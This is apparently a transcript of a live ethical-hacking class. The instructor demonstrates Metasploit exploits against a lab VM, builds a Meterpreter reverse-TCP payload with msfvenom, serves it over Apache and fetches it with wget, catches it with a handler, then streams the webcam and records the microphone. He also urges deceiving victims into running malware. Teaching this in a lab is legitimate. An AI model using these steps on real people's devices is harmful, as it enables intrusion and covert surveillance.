Again, the routine dialogue, anybody's gonna guess what we're gonna do today? Obviously, you'll be saying, what is that? Gaining access, obviously, but not just that. What else are we gonna learn today?
Injecting payloads.
Payloads, okay. Session hijacking. So I believe SS Rujan. So session hijacking, no, we're not gonna do session hijacking today, Sujan. So these are what we're going to look at today. So we're going to deep dive into the usage of Metasploit framework on a whole. And apart from that, we're going to learn about Meterpreter payload. Meterpreter is something that is a very important component that is, that comes with your Metasploit. And other than that, we're going to create malwares using MSF Venom. We're going to send it to a victim machine, which is, in our case, is my personal laptop, which runs on IP address 0.19. That also runs Kali Linux as a host system. So we're going to see that today. Okay. So yeah, coming to the theory part. So my work of teaching you the theory and making you do stuff is almost to an end. And we have only a few theory classes left where we'll be discussing much about one thing that is left over in the exploitation thing is gaining, after gaining access, we have to do the maintaining access part, which will be migrating your process threads to a different thread, that being one part. And the second is persistent sessions. So that is what we're going to start with tomorrow. And after persistent sessions, we are going to start up with MITM, that is man in the middle attacks. All right. So after that, in the coming week, we'll be starting with our project. Okay. So let's talk about that after our presentation, if the time permits. So let's dive into this. So how many of you guys have done your homework on what is Metasploit? I'm waiting.
Sir, I've just seen what's Metasploit.
Okay.
According to me, Metasploit is nothing but it's a small type of project. It is like basically of computer security,
Okay.
which provides you a bit of information or give you pathways about the security vulnerabilities of the other systems that you want to crack in.
Okay.
And if you want to penetrate into the other system, then you need to run a test called, you need to run a test that if you're, whatever the hack that you're building is, will be able to penetrate in other or not. So basically a penetration test.
Okay. Okay.
So
I got your point. Any others would want to give it a try? What exactly is Metasploit framework? Partly whatever you said is correct about using it in penetration testing, but not exactly it. So you were mentioning about vulnerability assessment, which doesn't come much under Metasploit framework. Anybody else? A software which helps in pen testing? Okay. Any other?
It is like a platform where it has different types of payloads and even exploits, so which we can create and use them on different computers or systems.
Yeah. Okay, so this was something of a closest definition I was expecting. So Metasploit framework is that all-in-one tool where you have tons and tons of codes classified as different modules. That is, codes classified as exploits, as payloads, as auxiliaries, as posts, as knobs, etc., etc., etc. Okay, so as one of you was saying that this is going to be used for vulnerability assessment. No, I'd rather say that this is a framework that is used to exploit a service. Okay, that is, this is the tool that actually gives you the access of your victim's computer, which is why this forms one of the most important tool in your toolkit. Okay, alongside Nmap. Okay, so I think we've seen this particular slide yesterday. So Nmap and Metasploit framework are one of the most important tools that you need to have in your kit. And this was built by Rapid7. Keeping that aside, this is an exploitation framework with many exploits, payloads, etc. So I think we already discussed about the difference between what is an exploit, what is a payload, and an auxiliary, right? Anybody would want to answer that? What is the difference between exploit, payload, and auxiliary? People, am I going too fast? Do you want me to go a bit slow?
Yes, sir. Go a bit slow.
Okay, good. That's great. So I was saying that yesterday in our class, we discussed about the differences between exploits, payloads, and auxiliaries, right? So I was asking if any one of you could answer me, give me an answer on stating what exactly the difference between exploit, payload, and an auxiliary is. Can you guys give it a try?
Sir, exploit is basically getting into the system, which
Okay.
exploit is which we use to get into the system.
Right.
Whereas payload is after getting into the system, we inject all these scripts or we perform some task. That is a payload.
Okay.
Which is not both, is like a type of which is not exploit and which is not payload, but it is just like it's a feature. Other than that, then it is an auxiliary.
Cool. Perfect. So whatever you told was exactly right. So an exploit is a type of code or script that enables you to crack the system or exploit that particular service to get into the system. Payload is a part code that you attach with an exploit, which does your actual work of spawning your shell. Okay, so if you have a particular task written, you put it as a payload. An exploit is essentially a tool or a script that gives you the access to that system using one particular service that has an opening. And auxiliary is something that is not both, but then can be used for any other thing, scanning, enumeration, info gathering, etc., etc. Okay, so let's move into the next part of it. So prerequisites and procedure. So, as I was telling you, Metasploit framework is used to exploit different services. So before actually exploiting, to exploit those services, the first thing you need is an actual service that has vulnerability, isn't it? So what do you guys need to have a knowledge about the service itself? Can you see? Okay, I'll drop a hint for you guys. Can you see something fishy in this slide? Let me actually, yeah. So how are you going to know what services are running? Who can answer me this? The answer is in the slide itself. Look out something fishy that's there in this slide. I'll give you 2 minutes of time. What is something fishy about this slide? I'll repeat the question again. How do you get to know what services are running on a device?
Sir, you're asking only the screen or other than this?
What? Come again?
You're asking what's going on the screen or other than this, like behind the screen also what's going?
No. See, I'll put forward the question very clearly to you. I was asking, so one thing I was saying that to actually exploit a service using Metasploit, you need to know what services are running on a system, right? So I was asking you, how will you get to know what services are running on a system? And I was saying that the answer is in the slide itself. Look for something that is fishy in this slide, something that is not regular in this slide. I can't give you much more hint than this. I'm going to wait only for 2 minutes and I'm going to answer it.
So I think the second point.
The second point. Okay, what is a fishy thing in the second point?
Like we are asking someone, like I don't think so. We want to just scan and we should gather ourselves for information and everything.
Yeah. So what are you going to use?
So probably Nmap or that.
Say that.
Nmap or we are using
Exactly. So the answer is Nmap. You can find Nmap. I put it under a steganography and I embedded it in this particular line. If you can see, some of the letters in this line are bolded, which form N-M-A-P, Nmap. Okay. So this was a bit of steganography. So I think that you guys have gone through your cryptography, isn't it? So who can tell me the difference between steganography and cryptography? Did you guys have your CNS sessions? CNS classes? Computer network, cryptography network service?
No, sir.
Okay, so you didn't. So, okay. Maybe that will come in the next semester or something. Okay, so I'll tell you the difference between steganography and cryptography. Cryptography is where you encrypt stuff. That is, you replace letters with than from the original letters. Okay. For example, you're going to replace all these letters in the procedure to get an encrypted text. Whereas steganography is hiding a secret message inside a text. Okay. For example, I have not changed any of the letters, or I've not replaced any of the letters with other letters, but then I've hidden some text which is something irregular than the regular text you have. If you see, a few letters are bolded, which form NMAP, that is Nmap. So this is a bit of steganography. Okay, I just made this to make this class a bit more interesting. So before exploiting those services, you need to get to know the services, and Nmap is your best friend for that. Run your Nmap scanner, get to know the services that are running on the victim. Right. So yeah, that's good. So that is what you're going to do. So let's come to the procedure. So the first point is you have to know those procedures. You have to know the services that are on the victim system. After knowing that, all you have to do is go on Google, which is your best friend, obviously. Go on Google and search for the vulnerabilities of the services that you get to know while you scan. Okay, for example, let's take an example that there is MySQL version 4, which is a very old version that is running on the victim's computer. All you have to do is go on to Google, type out that particular version, MySQL version 4 point something, and search for its vulnerabilities and exploits. The first thing that you're going to get when you type out that is the CVE details page that I actually discussed about earlier, where you can find the different types of vulnerabilities present. Maybe there is a remote code execution, maybe there is a backdoor, maybe there is an info leak or something like that. And to gain access to a system, the most important things that you would need is either a backdoor or an RCE or something like a buffer overflow. Okay, so not going into much of those. So this is what you generally do. I mean, you can actually omit this step also if at all you know the exploit directly. For example, let's say that I performed an Nmap scan on one of my client's machine who has asked me to pen test it, and I found that there was a VSFTPD backdoor. VSFTPD 2.3.4 running on his system. So I don't need to go on Google again and again and search for it, right? Because I already know that VSFTPD 2.3.4 has a backdoor. So I directly trigger my MSF console and I penetrate it. I'll gather the proofs and evidences. I'll show it to him. See, there is an opening. You're using a very old VSFTPD version. Either update it or change the service. So whenever you don't know about any particular exploit or particular vulnerability, ask Google. Okay. So the next part is, after you find out what exploit you're going to use, come back to your terminal, start your PostgreSQL. Okay. So I was also telling you about this, right? Whenever you're using MSF console for the first time after you boot, you have to run PostgreSQL, so that it has a database connectivity for that to store the hosts and etc. So after you start your PostgreSQL, you have to start your MSF console. So anyways, the command for that is pretty much straight, which is MSF console. You can also use a tag queue for quiet startup. And then go ahead and search for that particular exploit. So I think I already discussed a few commands that you generally be using, right? So search is one of them. You can go ahead and use search for that particular exploit, search and type out that exploit, that will give you stuff. And then after you search for that, you have to change the, you have to set the exploit first. Okay, I'm sorry, I didn't mention the point over here. So you have to use the command use to, to choose the to choose the exploit. Once you choose the exploit, you have to change the options. So what do you mean by changing the options? You have different parameters, right? You have lhost, rhost, lport, rport, and if it's a brute force exploit, you have to upload a word list again. So all these options you need to set. After that, if at all there is a requirement that you need to set a payload, maybe a Metaplata payload, set the payload and set its options. And after all that procedure, go ahead and type this. That is either exploit or run. You can use in either of the commands. Okay. Is that good with the procedure, or you guys have any doubts?
No, sir.
No, sir.
Okay, that's good. So we are also going to see something about Meterpreter, as I was telling you. So does anybody know anything about Meterpreter?
No, sir.
Okay, an honest answer. Right. No, okay. So a Meterpreter is a payload. Okay, it's a very advanced payload, and whenever whenever you're exploiting whenever you're exploiting a backdoor service or something like that, an RC or a backdoor service that helps you gain access, all you get generally is a shell. Whereas a Meterpreter gives you something more than just a shell. Okay. Whenever there is a Meterpreter session open on your side, you can actually play an audio from your system, and it will play it in the victim system. You can send messages to him. You can download files. You can upload files. You can grab his banners. You can get his system info. Okay. You can shut it down. What more? You can do everything. You can switch on his webcam, etc., etc. So Meterpreter is a very powerful payload. Okay. And how are you going to set it is, all you need to do is you have to search for this particular pattern payload. Okay. That is, platform is again your OS. This is the Meterpreter payloads are available for Windows, Android, Linux, BSD, whatever, OS X also. So all you have to do is search for this particular pattern. Okay, platform. For example, I'm searching for Windows and reverse TCP. So that will be Windows/Meterpreter/TCP. Go ahead and search for it, and you will find out those related payloads. Okay. So yeah, this is an explanation about that. So the type of connection is either a reverse TCP or a bind. So a reverse shell or a bind shell. So this is, so to tell you a brief about this, a reverse shell is whenever you send a malware and the person clicks, you just start listening on your end, that is on the attacker's end, you will start listening, whereas the connection will come from the victim itself. This is called as a reverse connection. Whereas in a bind connection, you send the request itself, you send the connection request itself to an open service on his side. Okay. So I just gave you a brief on what is reverse and bind. This is actually one part of the assignment of today. So let's discuss that after this. And once the session is spawned, one of the most important command that you need to check out whenever there is a Meterpreter session up is help. So when you get a Meterpreter staged, you can go ahead and type help, which will give you all the command lists that you can perform on the victim system. Okay. Going up to next, malware creation. So before going into malware creation, as I told you, I have my Metasploitable running over here. This is running on 1.11. So let me actually show you different ways to use, different ways to exploit using Metasploit framework. So as I was telling you, the first thing that you need to do is know about the services, right? So what I'm going to do is I'm performing an aggressive scan and I want it on all ports, or maybe I just don't want all ports. Let it give the top ports. 192.168.1.11. Let's see, what else? Let it be. I'll do it on all ports. So let's wait for the scan to complete, and on another thing, we'll actually start our post. And one thing, guys, you actually don't need your exploitation framework always to actually gain a small access onto the victim system. Okay? You can actually directly make use of vulnerable services that allow a direct connection. For example, yeah, I'll actually show it to you. Right? In this. So yeah, NSF console. There you go. And Metasploit is actually up. Let's wait for the scan to complete. And one thing with Nmap is whenever the scanner is running, you press an enter and it will give you the status, how much the scan is actually complete. So this is also one feature. All right. So there you go. Our scan is complete. So I think we already exploited this particular VSFTPD in the last class, is it? So let's see another way how to actually directly get access. Right? So instead of exploiting, you can actually connect it right through your FTP command itself. So how are you going to connect it through your FTP command? FTP space 192.168.1.11, and I don't know if I did the code, so I'll just leave it. All right. So it gave me this, and it wants the name. So what was our MSF admin. Password is also MSF admin. So anyways, if at all you have, oh sorry. Anyways, if at all you know the password and stuff, you can directly go ahead and connect with that. And I was telling you that it also allows an anonymous login. Is it? So what can be that? Anonymous. If at all it allows you with an anonymous login, press you can enter the anonymous and directly enter without any password. So this is what anonymous login means. You don't have to specify any password if at all it has an anonymous login enabled. And with Nmap, you have a script to detect an anonymous FTP login if at all a particular server or a system is running. So this is also a type of getting access. The other thing is, SSH. So uh, the probable things you can do to SSH is, you have different auxiliary scanners for SSH brute login. In Metasploit framework, you can actually go and set that auxiliary scanner, so that once you have the SSH, you can do that. And anyways, you can use Hydra to brute force your SSH. And other than that, let me show you something called as, okay, no, I'll tell about this in the last slide. So let's see what else do we have. Telnet. So does anybody know something about Telnet? Guys?
Sir, it is a protocol.
Yes, good. Telnet is a protocol. What does it allow you to do? Okay, so
Yes, now that it is a pro.
Okay. So let me bring the eyes for you. So Telnet is something that lets you lets you connect to a system remotely. So that is something like a remote login protocol that also enables a two-way communication. So all I need to do is just Telnet and your IP addresses, if at all that is there, and you actually see whatever is there on the Metasploit login itself. Metasploitable login itself. You have Metasploitable 2, a beautiful banner come up over here, MSF admin, what name, MSF admin, also our password, boom, you have it. So, all right. So something about Telnet over here. Also, other than that, let's see what else do we have. All right, if you see, there is actually a direct shell running on 1524. Okay, 1524. So you can actually use Telnet to connect it to, if I'm not wrong. So let me just test it out. 192.68.1.11 with 1524 as a port. There you go. So there was actually a bind shell itself running. You don't need to exploit anything. If at all you find a bind shell, directly go and connect to it. You'll have your access. So no need of any tools at all. Is it? So you can use Telnet remote login to do that also. Telnet, the IP address and your port 1524 where the shell bind or this thing is running, and there you go. You actually get directly the root access whenever you're doing this. Wonderful.
It will bypass the admin password and all.
Yeah. So other than that, you can also use Netcat to connect to open ports. Okay. Netcat, or also called as NC, or let me show you the manual. Man NC will give you something about Netcat. So Netcat is a utility that can be used to connect to open ports in a system, in a victim system or whatever. Okay. Now here also, all I need is NC 192.168.1.11 and 1524, and there you go. You have the access to it. And why is this? Because there is directly a bind shell running on it. You don't need to exploit anything. So going on further, you can actually go on to your browser and search for different services as well. So as I told you, make use of Google. What else can we see? IRC, Unreal IRCT. Let me copy that on. Oh, yeah. So there is actually a backdoor, but I don't know if that is compatible. But then, if at all that is put up in Metasploitable, I think that will be vulnerable. So, and anyways, yeah, that is in rapid7.com. So definitely that must be in MSF console as well. Backdoor command. So you have actually a backdoor. So let me go and check that same thing in Metasploit framework as well. Search. I'll enter that keyword. Oh yeah. Unrealized. Spelling. You have it. So I'll use that exploit, use 0. And I was telling you, once you choose the exploit, you need to set the options. And what are the options? So for this, you need to mention the R host. So there are actually two different types of host in port. One is R and one is L. L is the attackers, or you can also call it as local or listeners. And R is the victims or remote host or remote port. So let me set the R hosts. So what was our Metasploitable IP? So that was and what we have to do is run technician. Yes, you actually have a shell open over here. So as I was telling you, this is a non-interactive shell. You can see what is there inside that particular folder where it backdoored to. And if at all you need a interactive shell, you can go and run this command bash space tag I. Okay, with a bash space tag I, you can get this. Okay, whenever you have this detailing over here, root at Metasploitable, etc., that is called as an interactive shell. But whenever you gain an access to a system, it gives you an uninteractive, non-interactive shell. Okay, so there you go. You have exploited successfully that. This is what it is in the root at Metasploitable as well. So let me get back.
So is it possible to make a connection from this to our network, our main iOS, like main OS?
As it, can you actually elaborate? What are you asking?
Like we can make an SFTP connection or SSH connection, like SCP connection with this, like transferring files, everything.
Oh, sure, definitely you can do it. But then, why would you want to do it that way? You can actually directly drag and drop from your guest OS to host OS, right? Whenever you're running your virtual machine, if you enable drag and drop over here, where is that? See, whenever you enable the bidirectional drag and drop, you can actually drag and drop from your guest OS to host OS, and it will copy files. Why I'm saying is you can do it. You can use different softwares. You have FileZilla, you have WinSCP, you have command line tools and utilities as well to transfer, but then they'll be a bit slow. Get it? So,
Okay.
all those connections, SCP connection or whatever, that'll be a bit slow than what you do directly on a drag and drop. So yeah, if at all you want to transfer files from your guest and host to the opposite part, you can actually directly do a drag and drop, but you have to enable your bidirectional drop. Does that clear?
Yes, sir.
All right. So that's already around 6:45. So let's actually go to the next part of it. So what if a person doesn't have any vulnerable service running on his platform or on his OS or on his device? Whenever you don't have a vulnerable service, make a malware. Okay, prepare a malicious file where you will be injecting your payload of a reverse TCP, a Meterpreter reverse TCP, or whatever type of payload you want to. Create a malicious file and use your social engineering skills to convince him. Okay, so this is where again your mindset understanding comes into play again. So yeah, you'll make a payload, you'll make a malware file, you'll send it to him, but then you have to make him click that. You have to make him execute that. And when will he do it? When he completely believes in you, something like that. Is it? So how you're going to convince him is again on you. You have to use your social engineering skills, but then if you don't find any exploitable service in in your victim's system, you can make a malware. So, and how are we going to do it? We are going to use MSF Venom. Okay. And this is something about the usage. So where type in MSF Venom, tag T and specify the payload and then specify the architecture. Now, the thing with the architecture is, architecture means you have to mention if it is Windows or Linux 64, 86, whatever. But then MSF Venom is actually intelligent. Whenever you don't specify any platform or architecture, it will grab those things from the payload that you specify, because anyways you'll be specifying that Windows or Linux or whatever in your payload itself. So it is intelligent to understand your platform from there itself. So is this what any hacker use, like even pros, or is just teaching tools at these tools? Srujan, that's a very good question actually. There is no, there is nothing called as just a tool. Okay, whatever tools I have taught you over are actually being used in real time to exploit services, and Metasploit is something that tops it. Okay, I've already told you about Hydra. This is also in real time use for brute forcing and stuff. And if you're talking about Nmap, that is one of the most widespread tool. And without Nmap, there is no starting point of any penetration testing. So these are all real-time tools which you can actually use it. And as I told you, there is another tool called Burpsuit for web vulnerabilities and assessment and penetration testing. You'll be using Burpsuit to intercept your what you call requests and responses going by putting it up as a proxy from your thing to the internet or something like that, where you're actually the middle person and you can see the request and response. So that is used in web app pen testing. So these are all again real-time tools. These are not just a teaching purpose tools kind of thing, which means anyone can use it. It's even open source. Yes, anybody can use it. You can find it all over. You can have the source code if that is open source, and if that is a proprietary tool, obviously you won't find the code, but then you can use the tool. Yes, so for that question, yes, anybody can use this. That is what is the actual thing about open source, is it? Open source doesn't limit usage to only a few people, which is why I personally use most of open source tools, and whoever doesn't have that thing, who can. So we are not sure about who can attack from anywhere. Yes, totally true. You definitely can't know who is going to attack from what side or whatever. So which is why I was telling you in the starting of our course, I was telling you something, right? If you have your systems updated, if you have your if you think your device is secure just by updating your system or something like that, it's wrong. You have to take some extra measures of safety as well, because these tools are all open for everybody. And if at all he is a professional hacker, he'll actually do whatever he wants, only that particular task. But then if he's a script kiddie, that means if at all he's some person who's actually just starting his hacking career with, he might not know some stuff. He'll just run randomly everything, and that might be much more a threat to your device because that can damage all of your stuff. So you have to be careful in terms of whatever you do. So yeah, that's the answer to that. All right. So yeah, good questions, good series of questions. I hope that got some stuff into other people as well. So let's go ahead and create a payload. I mean, create a malicious file, which I'm going to send it to my personal laptop, which is running Linux again. So that is also having Kali Linux. So MSF Venom tag P. So I have Linux on that. So I go with Linux x64. So instead of the Linux x64, you can search it for Windows. You can search it for Android. Everything. Okay. So actually, before me actually creating that, let me show you the options. What all options you can use. So when you're typing out MSF Venom, you can use different options that are here as well. So to list all payloads, you can use a tag L, and a tag P is to mention the payload, whatever you're creating, the module, and then tag F is the format in which you want to save your executable payload. For example, if you're sending it to a Windows, that needs to be in .exe. So you have to specify tag F exe. Or if at all you're sending it to, if at all you're making an Android payload, you have to specify APK, something like that. So an executable in that particular platform, something like that. So, and as I told you, architecture is tag A. So where you have to specify your platforms, Windows or whatever specifically. And then tag O is to save that file into an output. Okay. So other than these important things, you can use all the others too. You can use different encoders, to evade firewalls and etc. So this being said about that, let's actually create the payload. All right. So MSF Venom tag P, and I want Linux x64. I need a Meterpreter session. So Meterpreter / and I want a reverse TCP. So underscore TCP. So once I mention the payload over here, I need to set the L host and R host, L host and L port value, the listeners. And other than that, so I won't be mentioning the architecture here. So let me actually, L host is equal to 192.168.1.15 if I'm not wrong, and L port, I'm going to choose L port to be 4242. So coming to the L port part, you can listen on any port that you want from 0 to 65,535, but just be careful that that is not already taken. Okay. That being said, what else do we need? What else did I miss? Architecture format. So since I'm sending it to my Linux, I'll use a format of ELF. ELF means executable and linkable format, something that is of Linux. And other than format, I'll be writing it out anyways. So let me name it Linux something, whatever. So hit enter. That will create your malicious file. I'm actually expecting a few doubts on this, so let's see. Cool. So no, so you can see the intelligence of this particular fellow. So there was no platform selected, so it took it as Linux from this particular payload that you set, and something like that. Architecture was not specified. So x64 was already in that, so it took that. So if you want to check ls, and let's see if we can find that file. Where is it? Linux Venom. So you want to check out what type of file it is. File Linux Venom. And there you go. It shows you that this particular thing is an ELF 64-bit LSB executable. So remember one thing, whenever you're sharing this particular script, I mean, since this is of Linux, uh, by default, it won't be an executable script. So it has to be changed with the permissions, it has to be made executable whenever it is sent to that particular system. So let me actually put this on my Apache server and share it to my other Kali system that is running on. Okay. So how do we do that? We have to move this particular file from here, Linux Venom, and move it to your web root location, which is var www html. So when you do that cd, let me check out if that actually probably went over there, var www html. Yes. So if you see, you have that the malicious file sent over in that HTML. Now what you have to do is service Apache to start. So from a Linux to any other thing, if you want to share a file, you can actually do this. Put that file in the web root location, start your Apache service, and all you have to do is go into your browser 192.15, the IP address of this particular thing. And when you press that, you can actually see it over here because that is hosted in your Apache server, local Apache server. So you can use this to share it anywhere, which is what I'm going to do right now in my other system. So give me a few minutes. Let me actually download that in my other system. And if at all you want to download stuff in your terminal, you can use this particular command, wget, okay, wget. And after wget, you have to specify your whatever link that you want to. So 192.168.1.15 slash the file name Linux Venom, and this will download it. So this is how you do it on a terminal in the command line. So yeah, some tools I won't be specifically adding it up in the PPT, but then I'll be telling you like this. For example, I mentioned about Netcat, I mentioned about this wget, and I also mentioned about how you're going to transfer files using your Apache server or something like that. So yeah, so give me a few minutes. Let me actually download that payload in my personal account. 168.1.15 slash Linux Venom. All right, I have my payload downloaded in my other computer, and I have to change the permissions. CH mod 777 or plus X, whatever you want. Linux Venom, and there you go. It has it. And meanwhile, when that procedure is actually happening on the other side, and the person is, going on and executing that, what you have to do is open up your MSF console. If you want the PPT to be given, this is what you can do. So after the file is created and shared to the victim, you have to open a listener on your side, because that person, whenever he executes the file, he'll be actually sending you a connection request, is it? So you need something that listens on your side for connections. Okay. So what you have to do is go on to your MSF console. Once you're in that, you have to start a listener, a handler, okay, a request handler, which is a listener here, and which is present in this particular path. So that is exploit multi-handler, and to that particular handler, you have to set the same payload which you used while you were actually creating the file. Okay, so what did I use back then? I used Linux 64 Meterpreter reverse TCP. So I'm going to use the same payload over here. So while actually executing this method, it's our brain to work out how we get the victim to run. Yes, exactly. So that is what I meant when I said that you have to work on your social engineering skills as well to deceive people. Okay. How many of you guys know a person called as Kevin Mitnick? Do you guys know a person called Kevin Mitnick. Okay, somebody raised their hands. Very good. Can you tell us about Kevin Mitnick? Who's the dollar? Okay, so Kevin Mitnick was a crazy hacker back then, and he didn't use any of these exploitation tools much. His biggest weapon was deception itself. That is, his biggest weapon was social engineering. And if at all you want to see something about Kevin Mitnick, so he was such a great hacker. So he's actually one of my inspiration. Yes, he was a okay. Nothing more. I know about him. So, okay. So Kevin Mitnick is a person who made use of social engineering very extensively, you can say. So that is a person, Kevin Mitnick, and there is actually a movie on him too, if you want to go and watch. That is a crazy movie. Okay, that is about hackers to take down. Put it up in the chat too. You can go and see that if you want. Hackers to take down, and there are actually many books written by him. Some of them is Ghosts and Wires, and apart from that, you have. Oh, I'm sorry. So yeah, sorry. So let me mention that in hackers to take down. So hackers to take down is a movie. Ghost Wires, Art of Deception, and Art of Intrusion are his books. You can go ahead and read them too. So he's a crazy hacker, okay? And his biggest weapon was social engineering. That is, he used to deceive people like crazy. So that being said, we'll actually move out. Move on with our session. So, all right, perfect. So you have to set the same payload, whatever you used while you're creating the malware in your handler, and you have to set your options. That is lhost and lport. Again, these lhost and lport should be the same exact details that you mentioned while you were creating the malware. For example, I use the port 4242 if I'm not wrong. Where is that? Yeah. So I use the port 4242. So whenever I'm starting a handler over here, I need to use the same port. If I choose any other port, waste of time. Okay. So the connection settings should be the exact same what you use at the this one, the malware creation time. And then run the handler, open up the listener, and wait for your victim to execute that file. So let's open up the handler. So I'm going to use exploit slash multi slash handler. So there you go. It's actually set up, and I want to see the options. And obviously, since you didn't set any payload to the handler, this is just a handler. That is just a listener. You need to set the payload. And how are you going to set the payload? Set payload, same exact things. Linux 64 Meterpreter reverse underscore TCP. Is that it? Search reverse underscore TCP. I go with type as payload and platform as that's cool. So this is what I want. All right, so the payload is set. So the command is set payload and that particular payload path, Linux x64 Meterpreter reverse TCP. Now that you've set the payload, show options, and you can see some options here which you have to change. So what was the L host? L host local host value was 15 if I'm not wrong. So set L host to be 192.168.1.15. There you go, it's set up, and set up L port to be 4242. If you want to cross verify, show options, and there you go, you have it. And all I have to do is open up my listener. So this started my reverse TCP handler here, and let me run that particular exploit in my other system. So I've run the file in my other system, and if you're saying there is a stage, sending stage, which will be, starting initiating the Meterpreter session, and boom, there you go. You have a Meterpreter session, and you've successfully gained access of my other system. So if you want some proof about it, sysinfo, this is running, this is a 0.19 computer, which is my other laptop, which is running Kali rolling, and that is a x64 architecture. And now you have your Meterpreter session, right? So as I told you, whenever you have your Meterpreter session, go ahead and type help to see all your different commands, okay? So if you see, this is much more than just a shell, okay? So, okay. So before that, what all can we do? Obviously, you see, if you see here, you can download stuff, you can upload stuff, you can make files in it, you can remove files in that. And other than that, if you want to do something more fishy kind of thing, so you can, if at all you want to see what is on their cam, you can actually go ahead and webcam stream. Let me actually do it. Webcam underscore stream will give me your video that is running on. So sorry for the video not present over here. I've actually taped up my webcam on my personal computer, so I just don't want to take the risk of showing my face over here. So right, so this is how you're going to see it. And if at all you are exploiting any device that has two cameras, you'll have options in it where you can select what camera you want to stream on. For to list that, actually you can so to list that, you can actually use the webcam underscore list, which will show you the number of the different webcams over there. And other than that, you can listen to whatever they are talking. Mic start will start capturing the audio from them, and you can play an audio from your particular system too. Okay, for example, make some creepy file that says, you've been hacked or something like that, and if at all you want to play it right after you get your Meterpreter session, go ahead and play it. But then one thing about this is, whenever you play an audio, you can't stop it. That is one of the drawback over here. The only control you have over here is playing the audio. It will play, but then it will stop only after that is completed. Other than that, you can also open a traditional shell just by typing shell, and you have it over here. You have your shell too. So okay, so these are all my files in that particular location, the home location. And if at all you want an interactive shell, I told you the command is bash tag I, and there you go. I have my root open, and I can clearly see whatever is going on here. All right. So seems interesting, isn't it? So let me exit back my shell. So there we go. We are back at our Meterpreter session again. So go ahead and check out all these different kinds of, whatever you have over here, different kinds of options. Go check it out. I assume it's just our own sense not to consume any stuff. Okay. So leave that. And so this is how you gain access to a system using by creating malwares yourself. So now that we have discussed a malware to one of our own pieces, we have tested out how it goes. Cool. Let's come right. I'm sorry, Srujan, I'll address your doubts right after the call because I think we are already running out of time. It's 7:10. Thank you so much. And after that, we are going to see this slide which says something about privilege escalations. So what do you mean by privilege escalation? So whenever you exploit a few services, all you get around is a user access. Okay. Now, privilege escalation, simply by its name, it means that you can escalate your privileges by making use of some other vulnerabilities in that particular system itself to gain an additional access, okay, to gain a master level access, something like a administrator or a root access, something like that. So that is what is privilege escalation. Okay. So that being said about privilege escalation, there are two types of privilege escalations. One is horizontal and the other is vertical. Now, when you're talking about horizontal privilege escalations, for suppose there is one particular system that has 3 users. Okay, one is the administrator, the other two are user 1 and user 2. Now, if you see, user 1 and user 2 have almost the same privileges, but then they are different accounts, right? So when you want to gain access of user 2, you already have user 1's access. You want to take over the access of user 2. That is called as horizontal escalation. Now, when you want to have the access of the root or the administrator itself, that is when it is called as a vertical escalation. Okay, is that clear? So let's see. So I was telling you that I'll show you something when we are in the privilege escalation slide, is it? So I'll show you. Let's exit the Meterpreter session over here and let's exit this too. Actually, how to stop that malware from running. Okay. So yeah, as I told you, that is a good question actually, but then yeah, let me address that after the session. Simply just stop your session and that malware will run. And if at all you suspect, I mean, you're on the victim side and you want to stop that off, just delete that app or, delete that thing from your processes and it'll, take you, the malware will be stopped. So that's just a quick answer to that. And let me show you some privilege escalations. Okay. Good. So we were spawning, we were actually trying out the SSH connection, right? So let's try out connecting to our Metasploitable 1.11 if I'm not wrong. And yeah. So okay, this is asking me so let me actually MSF admin. So it actually asked me for root directly because I was searching out earlier. So SSH MSF admin at this, and it asks me for MSF admin's password and MSF ADMIN. Okay. MSF ADMIN at keyboards again. Come on. MSF ADMIN. Let me copy this. Control C and SSH. There you go. So what do you see towards the left over here? This is the user called MSF admin. Is it? Okay, neither. So now I want to escalate my privileges from MSF admin to root. So I want to take a look at what I can run. So it says that so when you do sudo tagl, it lists. So whenever you are one particular user, for example, I'm MSF admin over here as a user. Whenever I do sudo tagl, it lists out what all I can run as a root. Okay, in this particular case, since this is a vulnerable machine, he just gave that user MSF admin may run all. Okay, he may run everything. So, well, in that case, I'd actually directly use sudo tag I. Sudo tag I will directly grab me through to the root. So now if you see, I've escalated my privileges, I've escalated my profile from MSF admin, which is a user, to the root. So there you go, you have the ultimate access to that particular thing. You can do whatever you want with it. You can damage that if you want, you can do whatever. Okay, you can create some persistent backdoors. So yeah, persistent backdoors is what we're going to discuss tomorrow. So this was all about gaining access. So tomorrow we're going to start about maintaining access. So as Sujan was saying that, how to stop the malware and stuff. And I told that whenever you delete that app, there you go. That's it, done. You lose your access. But then how to keep your access maintained even after a reboot, even after a close of Meterpreter session. That is where you have to write backdoors. Okay. Writing backdoors is nothing but creating persistent sessions, which we're going to look at in the tomorrow session. And after persistent sessions, we're going to start with man-in-the-middle attacks. So they'll be some of the last topics that we're going to deal with. That being said, and I'm sorry, I forgot to tell you about GTFO bins. So this is where you can actually learn how to escalate, make use of different commands in your Linux to escalate your privileges. Okay, different commands over here. Maybe apt-get and apt, you already know how to use that to get some pseudo permissions if at all that is allowed. AWK is one more important thing. You have bash, and you have different other commands of Linux that enable you to escalate your privileges from your user to your root or any others. So go ahead and click one particular thing. For example, I want to check out AWK, and it gives you how to escalate your privileges once you are inside it. So to escalate privileges, you need to be inside a machine already. So that being said, this is the last slide for today's class. Hope you enjoyed this session today. And let's quickly look at the assignment for today. This is your assignment for today. Try creating payloads for your Windows or your Android device, and try to gain access. Use your MSF Venom. I'm sorry I didn't put up yesterday's and day before yesterday's PPT. I'll put yesterday's and day before yesterday's PPT right in the group. So you can take references of commands and different stuff from this PPT as well if you want. So the other part of it is read about bind shell and check out the differences between reverse TCP and bind shell. So I already told you a bit of brief about what is a reverse and what is a bind shell. You can go ahead and check it out as well. Try to get some deep understanding about that. And I've already gave you this GTFO bins. You can go ahead and check it out for Linux privilege escalations. And you can also check out different other stuff in Windows, okay, from a user to administrator. So as a regular thing, let me actually paste this GTFO bins link in the chat. Okay, this is it. If you want to open that up right now, so go ahead and do that. So hope you all enjoyed this class. Do you have any doubts? Guys?
No doubt, sir.
Okay, that's good. Cool then. Let's see you in the next session. Thank you so much for attending this session. And sorry for the time shifts, unforeseen fixtures of my office and stuff, so can't help that. So hope you all enjoyed this class, because I know you would have obviously done that, because this is something about gaining access. So okay, that being said, let's meet you in the next session. Let me stop my share. Goodbye, have a nice day.